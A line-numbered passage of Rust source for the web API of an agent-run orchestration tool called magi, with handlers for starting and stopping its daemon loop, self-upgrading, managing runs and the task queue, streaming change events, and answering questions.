1829 merge: Option<String>,
1832 last_error: Option<String>,
1840 daemon: DaemonView,
1843}
1844
1845#[derive(Debug, Clone, Copy)]
1854struct Foreign {
1855 pid: Option<u32>,
1857}
1858
1859impl Foreign {
1860 fn of(reading: Option<&daemon::Reading>) -> Option<Self> {
1863 let reading = reading?;
1864 if !reading.running(Timestamp::now()) {
1865 return None;
1866 }
1867 match reading.pid {
1868 Some(pid) if pid == std::process::id() => None,
1869 pid => Some(Self { pid }),
1873 }
1874 }
1875
1876 fn who(&self) -> String {
1879 match self.pid {
1880 Some(pid) => format!("another magi process (pid {pid})"),
1881 None => "another magi process".to_owned(),
1882 }
1883 }
1884}
1885
1886type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1891
1892fn launch_daemon(
1894 opts: daemon::Opts,
1895 stop: daemon::Stop,
1896) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1897 Box::pin(daemon::serve_until(opts, stop))
1898}
1899
1900#[derive(Debug, Default)]
1902struct LoopState {
1903 live: Option<Live>,
1905 rev: u64,
1913 last_error: Option<String>,
1916}
1917
1918#[derive(Debug)]
1920struct Live {
1921 stop: daemon::Stop,
1923 handle: tokio::task::JoinHandle<()>,
1928 opts: daemon::Opts,
1932}
1933
1934impl Live {
1935 fn alive(&self) -> bool {
1937 !self.handle.is_finished()
1938 }
1939}
1940
1941fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1948 state.lock().unwrap_or_else(PoisonError::into_inner)
1949}
1950
1951async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1953 blocking(move || {
1954 let reading = daemon::read_status(&ui.home);
1955 Ok(Json(ui.loop_view(reading)))
1956 })
1957 .await
1958}
1959
1960#[derive(Debug, Deserialize)]
1966#[serde(deny_unknown_fields)]
1967struct LoopCommand {
1968 running: bool,
1969 #[serde(default)]
1979 park: bool,
1980}
1981
1982async fn loop_post(
1990 State(ui): State<Arc<Ui>>,
1991 body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1992) -> ApiResult<Json<LoopView>> {
1993 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1996 blocking(move || {
1997 let reading = daemon::read_status(&ui.home);
1998 let foreign = Foreign::of(reading.as_ref());
1999 if body.running {
2000 ui.start_loop(foreign)?;
2001 } else {
2002 ui.stop_loop(foreign, body.park)?;
2003 }
2004 Ok(Json(ui.loop_view(reading)))
2005 })
2006 .await
2007}
2008
2009#[derive(Debug, Serialize)]
2011struct UpgradeView {
2012 from: String,
2014 to: Option<String>,
2016 parked: Option<String>,
2018 detail: String,
2020}
2021
2022async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2046 let reading = daemon::read_status(&ui.home);
2047 if let Some(other) = Foreign::of(reading.as_ref()) {
2048 return Err(ApiError::conflict(format!(
2049 "the loop belongs to {}, so replacing this binary would leave \
2050 that process running an old one against the same queue. Upgrade \
2051 where it was started.",
2052 other.who()
2053 )));
2054 }
2055
2056 if crate::updater::disabled_by_env() {
2062 return Ok((
2063 StatusCode::OK,
2064 Json(UpgradeView {
2065 from: env!("CARGO_PKG_VERSION").to_owned(),
2066 to: None,
2067 parked: None,
2068 detail: format!(
2069 "Automatic updates are disabled by {}. Nothing was parked \
2070 and nothing restarted.",
2071 crate::updater::NO_AUTOUPDATE_ENV
2072 ),
2073 }),
2074 ));
2075 }
2076
2077 let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2082 let from = env!("CARGO_PKG_VERSION").to_owned();
2083 let latest = match crate::updater::Checker::new(&cfg.update) {
2084 Some(checker) => checker
2085 .newer_release()
2086 .await
2087 .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2088 None => None,
2089 };
2090 let Some(latest) = latest else {
2091 return Ok((
2092 StatusCode::OK,
2093 Json(UpgradeView {
2094 from,
2095 to: None,
2096 parked: None,
2097 detail: "Already on the newest release. Nothing was parked \
2098 and nothing restarted."
2099 .to_owned(),
2100 }),
2101 ));
2102 };
2103
2104 let parked = ui.park_for_upgrade()?;
2107 let detail = match &parked {
2108 Some(run) => format!(
2113 "Run {} is parking at its next step, which can take as long as \
2114 the step it is on - up to an hour for an implement wave. The \
2115 deck replaces itself once it parks, comes back, and the loop \
2116 carries that run on from where it stopped. Nothing is lost if \
2117 you close this.",
2118 crate::run::short_of(run)
2119 ),
2120 None => "The deck replaces itself and comes back. Nothing was in \
2121 flight to park."
2122 .to_owned(),
2123 };
2124
2125 let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2129 progress.parked_run = parked.clone();
2130 let _ = updater::write_progress(&ui.home, &progress);
2131
2132 let home = ui.home.clone();
2133 tokio::spawn(async move {
2134 if let Err(e) = upgrade_and_restart(home.clone()).await {
2135 tracing::error!("the upgrade did not complete: {e:#}");
2136 if let Some(mut progress) = updater::read_progress(&home) {
2137 progress.fail(format!("{e:#}"));
2138 let _ = updater::write_progress(&home, &progress);
2139 }
2140 }
2141 });
2142
2143 Ok((
2144 StatusCode::ACCEPTED,
2145 Json(UpgradeView {
2146 from,
2147 to: Some(latest.tag_name),
2148 parked,
2149 detail,
2150 }),
2151 ))
2152}
2153
2154async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2159 crate::updater::run_self_update(true, false, true).await?;
2162 tracing::info!("binary replaced - asking the server to hand over");
2163 if let Some(mut progress) = updater::read_progress(&home) {
2164 progress.advance(updater::Stage::Replaced);
2165 let _ = updater::write_progress(&home, &progress);
2166 }
2167 HANDOVER.notify_one();
2168 Ok(())
2169}
2170
2171#[derive(Debug, Serialize)]
2177struct RunSummary {
2178 id: String,
2179 short: String,
2180 status: String,
2181 done: bool,
2182 instruction: String,
2183 title: String,
2184 repo: String,
2185 repo_name: String,
2186 created_at: String,
2187 updated_at: String,
2188 candidates: usize,
2189 viable: usize,
2190 judges: usize,
2191 winner: Option<char>,
2192 reviews: usize,
2193 quota_losses: usize,
2194 event: Option<String>,
2195 superseded_by: Option<String>,
2200 waiting: bool,
2207 live: crate::run::Liveness,
2211 pr: Option<crate::run::PrRecord>,
2213 unmerged_by_design: bool,
2219}
2220
2221impl RunSummary {
2222 fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2223 Self {
2224 id: state.id.clone(),
2225 short: state.short().to_owned(),
2226 status: status_word(state.status),
2227 done: state.status.done(),
2228 unmerged_by_design: state.unmerged_by_design(),
2229 instruction: state.instruction.clone(),
2230 title: title_from(&state.instruction, TITLE_MAX),
2231 repo: state.repo.display().to_string(),
2232 repo_name: state
2233 .repo
2234 .file_name()
2235 .map(|n| n.to_string_lossy().into_owned())
2236 .unwrap_or_default(),
2237 created_at: state.created_at.to_string(),
2238 updated_at: state.updated_at.to_string(),
2239 candidates: state.candidates.len(),
2240 viable: state.viable().len(),
2241 judges: state.config.graph.judges,
2242 winner: state.winner().map(|c| c.label),
2243 reviews: state.reviews.len(),
2244 quota_losses: state.quota.len(),
2245 event: state.events.last().map(|e| e.message.clone()),
2246 waiting,
2247 live,
2248 superseded_by: None,
2251 pr: state.pr.clone(),
2252 }
2253 }
2254}
2255
2256fn status_word(status: RunStatus) -> String {
2259 status.as_str().to_owned()
2263}
2264
2265#[derive(Debug, Deserialize)]
2267struct ListQuery {
2268 #[serde(default)]
2269 limit: Option<usize>,
2270}
2271
2272async fn runs_list(
2273 State(ui): State<Arc<Ui>>,
2274 Query(q): Query<ListQuery>,
2275) -> ApiResult<Json<Vec<RunSummary>>> {
2276 let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2277 blocking(move || {
2278 let superseded = ui.queue.superseded();
2279 let open_runs: HashSet<String> = ui
2283 .questions
2284 .list()
2285 .into_iter()
2286 .filter(|q| q.status.open())
2287 .map(|q| q.run)
2288 .collect();
2289 let claimed: HashSet<String> =
2290 crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2291 .into_iter()
2292 .map(|c| c.run)
2293 .collect();
2294 let states = run_ids(&ui.runs)
2295 .into_iter()
2296 .filter_map(|id| read_run(&ui.runs, &id).ok())
2301 .take(limit);
2302 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2303 let summaries = summarize(
2304 states,
2305 &open_runs,
2306 &claimed,
2307 &superseded,
2308 |p| probe.borrow_mut().status(p),
2309 |p| probe.borrow_mut().started_at(p),
2310 );
2311 Ok(Json(summaries))
2312 })
2313 .await
2314}
2315
2316fn summarize<I, S, D>(
2322 states: I,
2323 open_runs: &HashSet<String>,
2324 claimed: &HashSet<String>,
2325 superseded: &HashMap<String, String>,
2326 mut status_q: S,
2327 mut identity_q: D,
2328) -> Vec<RunSummary>
2329where
2330 I: IntoIterator<Item = RunState>,
2331 S: FnMut(u32) -> Option<bool>,
2332 D: FnMut(u32) -> Option<String>,
2333{
2334 states
2335 .into_iter()
2336 .map(|state| {
2337 let waiting = open_runs.contains(&state.id);
2338 let live =
2339 state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2340 let mut row = RunSummary::of(&state, waiting, live);
2341 row.superseded_by = superseded
2342 .get(&state.id)
2343 .map(String::as_str)
2344 .map(crate::run::short_of)
2345 .map(str::to_owned);
2346 row
2347 })
2348 .collect()
2349}
2350
2351#[derive(Debug, Serialize)]
2358struct RunDetailView {
2359 #[serde(flatten)]
2360 state: RunState,
2361 instruction_md: Vec<md::Node>,
2362 live: crate::run::Liveness,
2377 unmerged_by_design: bool,
2382 superseded_by: Option<String>,
2390 latest_attempt: Option<LatestAttempt>,
2404}
2405
2406#[derive(Debug, Serialize)]
2408struct LatestAttempt {
2409 id: String,
2410 short: String,
2411 resolved: bool,
2422}
2423
2424impl RunDetailView {
2425 fn of(
2426 state: RunState,
2427 live: crate::run::Liveness,
2428 superseded_by: Option<String>,
2429 latest_attempt: Option<LatestAttempt>,
2430 ) -> Self {
2431 Self {
2432 instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2433 live,
2434 unmerged_by_design: state.unmerged_by_design(),
2435 superseded_by,
2436 latest_attempt,
2437 state,
2438 }
2439 }
2440}
2441
2442async fn run_detail(
2443 State(ui): State<Arc<Ui>>,
2444 Path(id): Path<String>,
2445) -> ApiResult<Json<RunDetailView>> {
2446 blocking(move || {
2447 let id = resolve_run(&ui.runs, &id)?;
2448 let state = read_run(&ui.runs, &id)?;
2449 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2450 let live = state.liveness(daemon_claims);
2451 let superseded_by = ui
2452 .queue
2453 .superseded_by(&id)
2454 .as_deref()
2455 .map(crate::run::short_of)
2456 .map(str::to_owned);
2457 let latest_attempt = ui.queue.latest_attempt(&id).and_then(|head_id| {
2461 read_run(&ui.runs, &head_id).ok().map(|head| LatestAttempt {
2462 short: head.short().to_owned(),
2463 resolved: matches!(head.status, RunStatus::Merged | RunStatus::Ready),
2464 id: head.id,
2465 })
2466 });
2467 Ok(Json(RunDetailView::of(
2468 state,
2469 live,
2470 superseded_by,
2471 latest_attempt,
2472 )))
2473 })
2474 .await
2475}
2476
2477async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2486 let (id, unreadable) = {
2487 let ui = Arc::clone(&ui);
2488 blocking(move || {
2489 let id = resolve_run(&ui.runs, &id)?;
2490 match read_run(&ui.runs, &id) {
2491 Ok(state) => {
2492 let in_flight =
2493 crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2494 state
2495 .ensure_can_delete(in_flight)
2496 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2497 let dir = ui.runs.join(&id);
2498 std::fs::remove_dir_all(&dir)
2499 .with_context(|| format!("remove run directory {}", dir.display()))?;
2500 Ok((id, false))
2501 }
2502 Err(_) => {
2503 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2507 return Err(ApiError::conflict(format!(
2508 "run {id} is being worked on by a live daemon right now"
2509 )));
2510 }
2511 Ok((id, true))
2512 }
2513 }
2514 })
2515 .await?
2516 };
2517 if unreadable {
2518 crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2519 .await
2520 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2521 }
2522 let ui = Arc::clone(&ui);
2523 let done = id.clone();
2524 blocking(move || {
2525 ui.questions.abandon_for_run(
2528 &done,
2529 &format!("run {done} was deleted, so nothing is waiting for this answer"),
2530 )?;
2531 Ok(())
2532 })
2533 .await?;
2534 Ok(StatusCode::NO_CONTENT)
2535}
2536
2537async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2561 let (id, state) = {
2562 let ui = Arc::clone(&ui);
2563 blocking(move || {
2564 let id = resolve_run(&ui.runs, &id)?;
2565 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2566 return Err(ApiError::conflict(format!(
2567 "run {id} is being worked on by a live daemon right now"
2568 )));
2569 }
2570 let state = read_run(&ui.runs, &id).ok();
2571 Ok((id, state))
2572 })
2573 .await?
2574 };
2575 let removed = match state {
2576 Some(mut state) => {
2577 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2578 .await
2579 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2580 if removed.is_empty() {
2585 crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2586 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2587 }
2588 removed
2589 }
2590 None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2591 .await
2592 .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2593 };
2594 Ok(Json(FoldView {
2595 run: id,
2596 removed_count: removed.len(),
2597 removed,
2598 }))
2599}
2600
2601#[derive(Debug, Serialize)]
2603struct FoldView {
2604 run: String,
2605 removed: Vec<String>,
2607 removed_count: usize,
2608}
2609
2610#[derive(Debug, Deserialize)]
2613struct FoldMergedBody {
2614 #[serde(default)]
2615 pr_url: String,
2616}
2617
2618async fn run_fold_merged(
2638 State(ui): State<Arc<Ui>>,
2639 Path(id): Path<String>,
2640 Json(body): Json<FoldMergedBody>,
2641) -> ApiResult<Json<FoldMergedView>> {
2642 let pr_url = body.pr_url.trim().to_owned();
2643 if pr_url.is_empty() {
2644 return Err(ApiError::bad_request("pr_url is required"));
2645 }
2646 let (id, mut state) = {
2647 let ui = Arc::clone(&ui);
2648 blocking(move || {
2649 let id = resolve_run(&ui.runs, &id)?;
2650 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2651 return Err(ApiError::conflict(format!(
2652 "run {id} is being worked on by a live daemon right now"
2653 )));
2654 }
2655 let state = read_run(&ui.runs, &id)?;
2656 Ok((id, state))
2657 })
2658 .await?
2659 };
2660 let (before, after) = crate::land::correct_manual_merge(&mut state, &pr_url)
2661 .await
2662 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
2663 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2664 .await
2665 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2666 Ok(Json(FoldMergedView {
2667 run: id,
2668 before: before.as_str().to_owned(),
2669 after: after.as_str().to_owned(),
2670 removed,
2671 }))
2672}
2673
2674#[derive(Debug, Serialize)]
2676struct FoldMergedView {
2677 run: String,
2678 before: String,
2680 after: String,
2682 removed: Vec<String>,
2684}
2685
2686async fn run_resume(
2706 State(ui): State<Arc<Ui>>,
2707 Path(id): Path<String>,
2708) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2709 let (id, state) = {
2710 let ui = Arc::clone(&ui);
2711 blocking(move || {
2712 let id = resolve_run(&ui.runs, &id)?;
2713 let state = read_run(&ui.runs, &id)?;
2714 Ok((id, state))
2715 })
2716 .await?
2717 };
2718 if !state.status.resumable() {
2719 return Err(ApiError::conflict(format!(
2720 "run {} is `{}`, and only a stalled or blocked run can be resumed",
2721 state.short(),
2722 status_word(state.status)
2723 )));
2724 }
2725 if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2730 .into_iter()
2731 .next()
2732 {
2733 return Err(ApiError::conflict(format!(
2734 "the loop is running run {} right now; stop it first, or wait for \
2735 it to finish, before resuming a run by hand.",
2736 crate::run::short_of(&work.run)
2737 )));
2738 }
2739 let _resume = ui.begin_resume(&id)?;
2740
2741 let queued = RunSummary::of(
2744 &state,
2745 !ui.questions.open_for(&id).is_empty(),
2746 state.liveness(false),
2747 );
2748 let run = id.clone();
2749 tokio::spawn(async move {
2750 let _resume = _resume;
2751 match crate::graph::Runner::resume(&run) {
2752 Ok(mut runner) => {
2753 if let Err(e) = runner.execute().await {
2754 tracing::warn!("resume of run {run} stopped: {e:#}");
2755 }
2756 }
2757 Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2760 }
2761 });
2762 Ok((StatusCode::ACCEPTED, Json(queued)))
2763}
2764
2765async fn run_report(
2766 State(ui): State<Arc<Ui>>,
2767 Path(id): Path<String>,
2768) -> ApiResult<impl IntoResponse> {
2769 let text = blocking(move || {
2770 let id = resolve_run(&ui.runs, &id)?;
2771 let state = read_run(&ui.runs, &id)?;
2775 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2776 let live = state.liveness(daemon_claims);
2777 Ok(format!(
2778 "{}{}",
2779 report::run(&state),
2780 report::active_seats(&state, live)
2781 ))
2782 })
2783 .await?;
2784 Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2785}
2786
2787#[derive(Debug, Serialize)]
2793struct TaskView {
2794 #[serde(flatten)]
2795 task: Task,
2796 source_label: String,
2797 status_str: &'static str,
2798 instruction_md: Vec<md::Node>,
2802 waits_on: Vec<String>,
2806 stuck_roots: Vec<String>,
2809}
2810
2811impl From<Task> for TaskView {
2812 fn from(task: Task) -> Self {
2813 Self {
2814 source_label: task.source.label(),
2815 status_str: task.status.as_str(),
2816 instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2817 waits_on: Vec::new(),
2818 stuck_roots: Vec::new(),
2819 task,
2820 }
2821 }
2822}
2823
2824impl TaskView {
2825 fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2826 let waits_on = inv.waits_on(&task);
2827 let stuck_roots = inv
2828 .stuck_roots(&task)
2829 .iter()
2830 .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2831 .collect();
2832 Self {
2833 waits_on,
2834 stuck_roots,
2835 ..Self::from(task)
2836 }
2837 }
2838}
2839
2840#[derive(Debug, Default, Deserialize)]
2843#[serde(default)]
2844struct ReposQuery {
2845 refresh: u8,
2846}
2847
2848async fn repos_list(
2855 State(ui): State<Arc<Ui>>,
2856 Query(q): Query<ReposQuery>,
2857) -> ApiResult<Json<Vec<repos::Repo>>> {
2858 let refresh = q.refresh != 0;
2859 blocking(move || {
2860 let (cfg, _) = Config::discover(&ui.repo, None)?;
2861 Ok(Json(ui.repos_cache.list(
2862 &cfg.repos.roots,
2863 Duration::from_secs(cfg.repos.scan_ttl),
2864 refresh,
2865 )))
2866 })
2867 .await
2868}
2869
2870async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2871 blocking(move || {
2872 let tasks = ui.queue.list();
2873 let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2874 Ok(Json(
2875 tasks
2876 .into_iter()
2877 .map(|t| TaskView::with_inventory(t, &inv))
2878 .collect(),
2879 ))
2880 })
2881 .await
2882}
2883
2884#[derive(Debug, Default, Deserialize)]
2887#[serde(default, deny_unknown_fields)]
2888struct HoldBody {
2889 reason: Option<String>,
2890}
2891
2892async fn queue_hold(
2893 State(ui): State<Arc<Ui>>,
2894 Path(id): Path<String>,
2895 body: std::result::Result<Json<HoldBody>, JsonRejection>,
2896) -> ApiResult<Json<TaskView>> {
2897 let body = match body {
2901 Ok(Json(body)) => body,
2902 Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
2903 Err(e) => return Err(ApiError::bad_request(e.body_text())),
2904 };
2905 let reason = body.reason.filter(|r| !r.trim().is_empty());
2906 mutate(ui, id, move |t| {
2907 t.hold_manual(reason.clone());
2908 Ok(())
2909 })
2910 .await
2911}
2912
2913async fn queue_release(
2914 State(ui): State<Arc<Ui>>,
2915 Path(id): Path<String>,
2916) -> ApiResult<Json<TaskView>> {
2917 mutate(ui, id, |t| {
2918 t.release();
2919 Ok(())
2920 })
2921 .await
2922}
2923
2924#[derive(Debug, Deserialize)]
2926#[serde(deny_unknown_fields)]
2927struct PriorityBody {
2928 priority: i32,
2929}
2930
2931async fn queue_priority(
2937 State(ui): State<Arc<Ui>>,
2938 Path(id): Path<String>,
2939 body: std::result::Result<Json<PriorityBody>, JsonRejection>,
2940) -> ApiResult<Json<TaskView>> {
2941 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2942 mutate(ui, id, move |t| t.set_priority(body.priority)).await
2943}
2944
2945#[derive(Debug, Deserialize)]
2947#[serde(deny_unknown_fields)]
2948struct EditBody {
2949 title: String,
2950 instruction: String,
2951}
2952
2953async fn queue_edit(
2957 State(ui): State<Arc<Ui>>,
2958 Path(id): Path<String>,
2959 body: std::result::Result<Json<EditBody>, JsonRejection>,
2960) -> ApiResult<Json<TaskView>> {
2961 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2962 mutate(ui, id, move |t| {
2963 t.edit(body.title.clone(), body.instruction.clone())
2964 })
2965 .await
2966}
2967
2968async fn queue_done(
2976 State(ui): State<Arc<Ui>>,
2977 Path(id): Path<String>,
2978) -> ApiResult<Json<TaskView>> {
2979 let home = ui.home.clone();
2980 mutate(ui, id, move |t| {
2981 t.succeed();
2982 crate::daemon::supersede_prior_runs(t, &home);
2990 Ok(())
2991 })
2992 .await
2993}
2994
2995async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
3003 blocking(move || {
3004 let id = resolve_task(&ui.queue, &id)?;
3005 let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
3006 ui.queue
3007 .remove(&id, in_flight, &ui.questions)
3008 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
3009 Ok(StatusCode::NO_CONTENT)
3010 })
3011 .await
3012}
3013
3014async fn mutate(
3023 ui: Arc<Ui>,
3024 id: String,
3025 change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
3026) -> ApiResult<Json<TaskView>> {
3027 blocking(move || {
3028 let id = resolve_task(&ui.queue, &id)?;
3029 let _claim = ui.queue.claim(&id).map_err(|e| {
3034 ApiError::conflict(format!(
3035 "{e:#} - a daemon is running this task, so it cannot be \
3036 changed from here yet"
3037 ))
3038 })?;
3039 let mut task = ui.queue.get(&id)?;
3040 change(&mut task).map_err(ApiError::bad_request_from)?;
3041 ui.queue.put(&mut task)?;
3042 Ok(Json(TaskView::from(task)))
3043 })
3044 .await
3045}
3046
3047async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
3055 let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
3056 tokio::spawn(async move {
3057 let mut ticker = tokio::time::interval(POLL);
3058 let mut last: Option<(u64, u64, u64, u64, u64, u64)> = None;
3059 loop {
3060 ticker.tick().await;
3063 let state = Arc::clone(&ui);
3064 let revisions = tokio::task::spawn_blocking(move || {
3065 (
3066 state.queue.revision(),
3067 runs_revision(&state.runs),
3068 state.questions.revision(),
3069 state.talks.revision(),
3070 state.notices.revision(),
3071 state.lock_loop().rev,
3075 )
3076 })
3077 .await;
3078 let Ok(revisions) = revisions else { break };
3079 if last == Some(revisions) {
3080 continue;
3081 }
3082 last = Some(revisions);
3083 let payload = serde_json::json!({
3084 "queue_rev": revisions.0,
3085 "runs_rev": revisions.1,
3086 "questions_rev": revisions.2,
3087 "talks_rev": revisions.3,
3088 "notifications_rev": revisions.4,
3089 "loop_rev": revisions.5,
3090 });
3091 let Ok(event) = Event::default().event("change").json_data(payload) else {
3093 break;
3094 };
3095 if tx.send(event).await.is_err() {
3096 break;
3097 }
3098 }
3099 });
3100 Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
3101 .keep_alive(KeepAlive::new().interval(KEEPALIVE))
3102}
3103
3104fn runs_revision(runs: &FsPath) -> u64 {
3111 use std::hash::{Hash as _, Hasher as _};
3112
3113 let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
3114 .into_iter()
3115 .flatten()
3116 .flatten()
3117 .filter_map(|e| {
3118 let path = e.path().join("run.json");
3119 let mtime = path
3120 .metadata()
3121 .ok()?
3122 .modified()
3123 .ok()?
3124 .duration_since(std::time::UNIX_EPOCH)
3125 .ok()?
3126 .as_millis() as u64;
3127 let id = e.file_name().to_string_lossy().into_owned();
3128 Some((id, mtime))
3129 })
3130 .collect();
3131
3132 if entries.is_empty() {
3133 return 0;
3134 }
3135
3136 entries.sort_unstable();
3137 let mut hasher = std::hash::DefaultHasher::new();
3138 for (id, mtime) in &entries {
3139 id.hash(&mut hasher);
3140 mtime.hash(&mut hasher);
3141 }
3142 let h = hasher.finish();
3143 if h == 0 { 1 } else { h }
3144}
3145
3146fn run_ids(runs: &FsPath) -> Vec<String> {
3152 let mut ids: Vec<String> = std::fs::read_dir(runs)
3153 .into_iter()
3154 .flatten()
3155 .flatten()
3156 .filter(|e| e.path().join("run.json").is_file())
3157 .map(|e| e.file_name().to_string_lossy().into_owned())
3158 .collect();
3159 ids.sort_unstable_by(|a, b| b.cmp(a));
3161 ids
3162}
3163
3164fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3166 let path = runs.join(id).join("run.json");
3167 let body =
3168 std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3169 let state: RunState =
3170 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3171 if state.schema != run::SCHEMA {
3172 anyhow::bail!(
3173 "run {} was written by a different magi (schema {}, this build speaks {})",
3174 state.id,
3175 state.schema,
3176 run::SCHEMA
3177 );
3178 }
3179 Ok(state)
3180}
3181
3182#[must_use]
3190pub fn runs_unreadable(runs: &FsPath) -> usize {
3191 run_ids(runs)
3192 .into_iter()
3193 .filter(|id| read_run(runs, id).is_err())
3194 .count()
3195}
3196
3197fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3199 if runs.join(id).join("run.json").is_file() {
3200 return Ok(id.to_owned());
3201 }
3202 pick(run_ids(runs), id, "run")
3203}
3204
3205fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3207 if queue.path_of(id).is_file() {
3208 return Ok(id.to_owned());
3209 }
3210 pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3211}
3212
3213#[derive(Debug, Serialize)]
3224struct QuestionView {
3225 #[serde(flatten)]
3226 question: Question,
3227 detail_md: Vec<md::Node>,
3228 waiting_on_agent: bool,
3238}
3239
3240impl From<Question> for QuestionView {
3241 fn from(question: Question) -> Self {
3242 let base = md::ImageBase::QuestionPanel {
3243 id: question.id.clone(),
3244 };
3245 Self {
3246 detail_md: md::to_nodes(&question.detail, &base),
3247 waiting_on_agent: question.waiting_on_agent(),
3248 question,
3249 }
3250 }
3251}
3252
3253async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3259 blocking(move || {
3260 Ok(Json(
3261 ui.questions
3262 .list()
3263 .into_iter()
3264 .map(QuestionView::from)
3265 .collect(),
3266 ))
3267 })
3268 .await
3269}
3270
3271async fn notifications_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3274 blocking(move || {
3275 let items = ui.notices.list();
3276 let unread = items.iter().filter(|n| n.unread()).count();
3277 Ok(Json(
3278 serde_json::json!({ "unread": unread, "items": items }),
3279 ))
3280 })
3281 .await
3282}
3283
3284fn notice_error(e: anyhow::Error) -> ApiError {
3285 ApiError::not_found(format!("{e:#}"))
3288}
3289
3290async fn notification_read(
3292 State(ui): State<Arc<Ui>>,
3293 Path(id): Path<String>,
3294) -> ApiResult<Json<Notice>> {
3295 blocking(move || ui.notices.mark_read(&id).map(Json).map_err(notice_error)).await
3296}
3297
3298async fn notification_dismiss(
3300 State(ui): State<Arc<Ui>>,
3301 Path(id): Path<String>,
3302) -> ApiResult<Json<Notice>> {
3303 blocking(move || ui.notices.dismiss(&id).map(Json).map_err(notice_error)).await
3304}
3305
3306async fn notifications_read_all(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3308 blocking(move || {
3309 let changed = ui.notices.mark_all_read()?;
3310 Ok(Json(serde_json::json!({ "marked": changed })))
3311 })
3312 .await
3313}
3314
3315#[derive(Debug, Default, Deserialize)]
3321#[serde(default, deny_unknown_fields)]
3322struct NewAnswer {
3323 choice: Option<String>,
3324 text: Option<String>,
3325}
3326
3327async fn question_answer(
3328 State(ui): State<Arc<Ui>>,
3329 Path(id): Path<String>,
3330 body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3331) -> ApiResult<Json<QuestionView>> {
3332 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3333 let answer = match (body.choice, body.text) {
3334 (Some(c), None) => Answer::Choice(c),
3335 (None, Some(t)) => Answer::Text(t),
3336 (Some(_), Some(_)) => {
3337 return Err(ApiError::bad_request(
3338 "send either `choice` or `text`, not both",
3339 ));
3340 }
3341 (None, None) => {
3342 return Err(ApiError::bad_request("send a `choice` or a `text`"));
3343 }
3344 };
3345
3346 blocking(move || {
3347 let id = resolve_question(&ui.questions, &id)?;
